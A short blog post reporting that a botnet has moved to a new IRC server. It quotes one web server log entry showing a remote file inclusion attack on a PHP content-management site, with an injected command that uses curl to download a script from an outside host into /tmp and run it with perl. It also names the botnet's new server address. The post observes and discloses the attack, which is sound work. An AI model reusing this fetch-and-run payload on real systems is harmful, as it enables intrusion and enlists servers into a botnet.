More botnet
Seems the same people that control the botnet I wrote about in my previous post have moved to an other server. I saw this request in a log today:
200.182.50.156 - - [26/Dec/2006:04:03:23 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://sclipici.0catch.com/br/scan.txt;perl%20/tmp/unix ? HTTP/1.0" 200 10922 "-" "Mozilla/5.0"
This request reffers to this http://sclipici.0catch.com/br/scan.txt script. When you open that script you see that the new irc server is now 194.109.20.90, all other stuff like channels and nicknames has stayed the same.
No comments
Jump to comment form | comments rss [?] | trackback uri [?]